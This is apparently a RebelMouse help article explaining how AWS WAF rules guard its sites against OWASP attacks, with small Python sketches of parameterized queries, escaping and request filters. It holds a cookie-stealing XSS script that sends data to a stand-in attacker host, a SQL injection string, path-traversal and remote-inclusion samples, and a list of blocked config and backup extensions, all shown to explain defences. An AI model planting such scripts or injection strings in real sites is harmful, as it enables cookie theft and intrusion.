Amazon Web Services' (AWS) Web Application Firewall (WAF) helps protect your web applications and APIs against common web exploits that can affect availability, compromise security, or consume excessive resources. AWS WAF gives RebelMouse developers control over how traffic reaches our applications by letting us create security rules that block common attack patterns, such as SQL injection or cross-site scripting (XSS), as well as rules that filter out specific traffic patterns we have defined. These rules are regularly updated as new issues emerge.
With AWS WAF, we make sure that all our sites are covered against some of the most common attacks, as defined by the Open Web Application Security Project (OWASP). The project is an online community that creates freely available articles, methodologies, documentation, tools, and technologies in the field of web application security.
Possible Common Attacks
Injections: Injection flaws allow attackers to relay malicious code through an application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to back-end databases via SQL (e.g., SQL injection). Whole scripts written in Perl, Python, and other languages can be injected into poorly designed applications and executed. Any time an application uses an interpreter of any type, there is a danger of introducing an injection vulnerability.
For example, if somebody tries to inject JavaScript into your site, AWS WAF can block the request automatically before the payload is inserted.
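To illustrate the underlying flaw (this is a generic sketch, not RebelMouse production code), the difference between a query built by string concatenation and a safe parameterized query can be shown in Python with the standard sqlite3 module:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0)")

user_input = "alice' OR '1'='1"  # attacker-controlled value

# Vulnerable: the input is spliced directly into the SQL text,
# so the injected OR clause matches every row.
vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: the driver treats the input as a literal value, not as SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)
).fetchall()

print(vulnerable)  # [('alice',)] -- the injection matched the row
print(safe)        # [] -- no user is literally named "alice' OR '1'='1"
```

A WAF adds a second layer on top of this kind of input handling by rejecting requests that carry injection patterns before they reach the application at all.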
Protection for Cross-Site Scripting: Cross-site scripting flaws occur when web applications include user-provided data in webpages that are sent to the browser without proper sanitization. If the data isn't properly validated or escaped, an attacker can use these vectors to embed scripts, inline frames (iframes), or other objects into the rendered page. These, in turn, can be used for a variety of malicious purposes, from stealing user credentials with keyloggers to installing malware on the user's system. The impact of the attack is magnified if that user data persists server side in a data store, and then is delivered to a large set of other users.
Consider the example of a simple but popular blog that accepts user comments. If user comments aren't correctly sanitized, a malicious user can embed a harmful script in a comment, such as:
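A hypothetical example of such a malicious comment (the attacker URL below is invented for illustration):

```html
<script>
  // Sends every visitor's cookies to a site the attacker controls
  new Image().src = "https://attacker.example/steal?c=" + document.cookie;
</script>
```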
The code then gets executed anytime a legitimate user loads that blog article.
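Server-side escaping is the corresponding application-level defense; a minimal sketch using Python's standard html module:

```python
import html

comment = '<script>alert("stolen cookies")</script>'

# Escaping converts markup characters into harmless entities, so the
# browser renders the comment as plain text instead of executing it.
escaped = html.escape(comment)
print(escaped)
# &lt;script&gt;alert(&quot;stolen cookies&quot;)&lt;/script&gt;
```

AWS WAF complements this by blocking requests that carry XSS payloads before they are ever stored or rendered.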
Broken Access Control: This category of application flaw covers the lack of, or improper enforcement of, restrictions on what authenticated users are allowed to do. AWS WAF can filter dangerous HTTP request patterns that can indicate path traversal attempts, or remote and local file inclusion (RFI/LFI). AWS WAF checks whether HTTP request components contain ../ or ://.
This helps us stop malicious attackers from exploiting vulnerabilities that would let a user access resources or perform actions they are not supposed to be able to.
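The matching rule described above is simple string inspection; a rough Python sketch of the same check (the function name is ours for illustration, not an AWS API):

```python
def looks_like_traversal(request_part: str) -> bool:
    """Flag request components containing path traversal or
    remote-inclusion markers, mirroring the ../ and :// checks."""
    return "../" in request_part or "://" in request_part

print(looks_like_traversal("/assets/img/logo.png"))             # False
print(looks_like_traversal("/download?file=../../etc/passwd"))  # True
print(looks_like_traversal("/page?src=http://evil.example/x"))  # True
```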
How AWS WAF Protects Our Servers From Attacks
Insufficient Attack Protection: AWS WAF enforces a level of hygiene for inbound HTTP requests. Size constraint conditions help to build rules that ensure that components of HTTP requests fall within specifically defined ranges. We can use these rules to avoid processing abnormal requests. An example is to limit the size of URIs or query strings to values that make sense to our application.
In our case, we're limiting the URI and QUERY_STRING bytes.
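Conceptually, a size constraint condition amounts to a byte-length check on each request component; a minimal sketch, with illustrative limits only (the actual values are tuned per application):

```python
MAX_URI_BYTES = 512           # illustrative, not our production value
MAX_QUERY_STRING_BYTES = 1024 # illustrative, not our production value

def within_size_limits(uri: str, query_string: str) -> bool:
    """Accept a request only if its URI and query string fall
    within the byte ranges the application expects."""
    return (len(uri.encode("utf-8")) <= MAX_URI_BYTES
            and len(query_string.encode("utf-8")) <= MAX_QUERY_STRING_BYTES)

print(within_size_limits("/articles/security", "page=2"))  # True
print(within_size_limits("/a", "x" * 5000))                # False
```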
Using Components With Known Vulnerabilities: AWS WAF filters and blocks HTTP requests to the functionality of components that are not in use in applications. This helps reduce the attack surface of those components if vulnerabilities are discovered in functionality you're not using.
AWS WAF matches URIs to filenames that end with:
- .cfg
- .conf
- .config
- .ini
- .log
- .bak
- .backup
The HTTP request component inspected is the URI.
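The suffix match on the URI can be sketched in Python as follows (a simplified illustration of the rule, not the AWS implementation):

```python
BLOCKED_SUFFIXES = (".cfg", ".conf", ".config", ".ini",
                    ".log", ".bak", ".backup")

def blocked_by_suffix(uri: str) -> bool:
    """Match URIs whose path ends with a configuration or backup
    file extension that public traffic should never request."""
    # Compare case-insensitively and ignore any query string.
    path = uri.split("?", 1)[0].lower()
    return path.endswith(BLOCKED_SUFFIXES)

print(blocked_by_suffix("/index.html"))        # False
print(blocked_by_suffix("/app/settings.ini"))  # True
print(blocked_by_suffix("/db/dump.BAK?x=1"))   # True
```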
We're also setting up a mechanism to mitigate known vulnerabilities that addresses the full lifecycle of such components: we identify and track the dependencies of our application, as well as the dependencies of the underlying components, so we can monitor the processes in place to track their security.
Robots.txt Crawl-Delay Directive: Aside from the AWS WAF protection mechanisms, we have also included a directive into our default robots.txt files called crawl-delay.
The crawl-delay directive tells crawlers to slow down so they don't overload the web server. On our pages, we have it set to 0.1 seconds, which is the default setting for our robots.txt file. Clients can override the crawl-delay directive in our Layout & Design Tool, and if you have already made manual changes to your file, we recommend that you check it and add the directive manually. You can also modify the crawl-delay value to suit your needs.
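For reference, the relevant lines in a robots.txt file look like this (the user-agent line is generic; 0.1 is our default value):

```
User-agent: *
Crawl-delay: 0.1
```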
Overall, this server protection allows us to automatically block repeated requests to our sites so that we can identify malicious attacks and block them right away. Based on what code is returned, you will be able to tell why the requests were blocked:
- 429: Too many requests have been made.
- 406: The status code for OWASP risks. The response message will contain a code that matches a specific type of vulnerability. We use a separate set of codes to hide our protection logic from public users, but we can share what each one means with you as needed. The following screenshot shows how this looks:
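A client that wants to react to blocked requests can branch on the status code; a minimal sketch covering only the two codes documented above (the function and messages are ours for illustration):

```python
def explain_block(status_code: int) -> str:
    """Translate the documented WAF block codes into messages."""
    if status_code == 429:
        return "Rate limited: too many requests; slow down and retry."
    if status_code == 406:
        return "Blocked for an OWASP risk; check the code in the response body."
    return "Not a documented WAF block code."

print(explain_block(429))  # Rate limited: too many requests; slow down and retry.
```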
If you have any questions, please reach out to your account manager or email us at support@rebelmouse.com, and we'll help you solve your particular use case.